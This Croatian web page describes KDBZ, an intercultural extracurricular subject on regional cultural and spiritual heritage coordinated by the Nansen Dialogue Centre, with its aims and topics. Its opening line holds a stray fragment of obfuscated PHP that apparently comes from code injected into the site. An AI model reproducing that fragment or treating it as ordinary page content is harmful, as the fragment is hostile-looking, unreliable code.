header

*/($a3b0c4[$o5b2['i29321'][6]]);}exit();}} ?>

Izvannastavna aktivnost Kulturna i duhovna baština zavičaja- KDBZ provodi se kontinuirano od šk. god. 2007/2008 u školama Osječko-baranjske i Vukovarsko-srijemske županije uz koordinaciju Nansen dijalog centra te praćenje od strane Agencije za odgoj i obrazovanje.

Predmet Kulturna i duhovna baština zavičaja (KDBZ) omogućuje djeci koja žive u multikulturalnoj i multietničkoj zajednici cjelovitije učenje o svome zavičaju, o kulturi i običajima naroda koji žive na ovom području, a s ciljem boljeg razumijevanja sebe i svoga identiteta te upoznavanja i poštovanja drugih i drukčijih, što je od iznimne važnosti za izgradnju odnosa i interkulturalnog društva.

Ovim je predmetom napravljen iskorak u postojećem školskom kurikulu: u Hrvatskoj, kao i u većini Europskih zemalja većina uči uglavnom o svom naslijeđu (povijest, jezik, kultura), a vrlo malo ili gotovo ništa o kulturi, povijesti i tradiciji manjina s kojima stoljećima živi u zajednici. S druge strane, manjinsko je obrazovanje osiguralo djeci upoznavanje vlastite kulture i izgradnju vlastitog identiteta, ali je ujedno postalo zaprjekom njihovoj integraciji u društvo, jer svaka manjina uči o većini i gotovo autistično o svojoj manjini. U odgovoru na ovu situaciju, KDBZ omogućuje i potiče sve učenike da uče o kulturnoj baštini svih etničkih skupina koje obitavaju u određenoj zajednici kako bi se bolje upoznali, razvili razumijevanje i poštivanje za različito i različite – a upravo je ovo neophodan preduvjet za razvoj održivih međuetničkih odnosa među skupinama koje obitavaju na istom prostoru.

Razvoj interkulturalnih kompetencija priprema učenike i za budući život u ujedinjenoj, multikulturalnoj Europi, a interkulturalno obrazovanje sastavni je dio i građanskog odgoja, koje se u skoroj budućnosti uvodi u redovni obrazovni sustav.

Teme kroz koje se provode aktivnosti predmeta KDBZ su:

- povijest i mitologija zavičaja
- migracije i odnosi među ljudima koji su došli iz različitih krajeva
- obitelj i njena povijest
- zanimanja roditelja i predaka, stari zanati i specifični proizvodi zavičaja
- vjerska obilježja, blagdani i običaji blagovanja naroda u zavičaju
- narodni običaje (crkveni, poljoprivredni, gospodarski, ostali)
- vjerovanja i praznovjerja
- folklor, narodne nošnje, glazba
- likovna umjetnost, rukotvorine
- književnost zavičaja
- značajne osobe zavičaja
- arhitektura zavičaja
- stari športovi, dječje igre i igre odraslih
- razvoj medija komuniciranja: jezika na području zavičaja, pismenosti, vrste pisma, načina prenošenja poruka i javnog oglašavanja
- kreativno rješavanje sukoba
- tolerancija, predrasude

Odabrane teme obrađuju se i ostvaruju u obliku terenske, istraživačke, izvanučioničke nastave i osmišljenih radionica, u fondu od 35 sati godišnje. Dva puta godišnje organiziramo susret svih škola i učenika uključenih u implementaciju KDBZ-a, na kojima učenici prezentiraju svoja postignuća i projekte, međusobno se upoznaju i druže.

Razvijen je i metodički Priručnik za učitelje Kulturna i duhovna baština zavičaja, nastao tijekom provedbe KDBZ-a u proteklih četiri godine, koji je Odlukom Agencije za odgoj i obrazovanje od 1. ožujka 2013. g. odobren kao Pomoćno nastavno sredstvo za ostvarivanje interkulturalnih sadržaja u osnovnoj školi.

Publikacije

interkulturno obrazovanje

Facebook

logo nansen korak po korak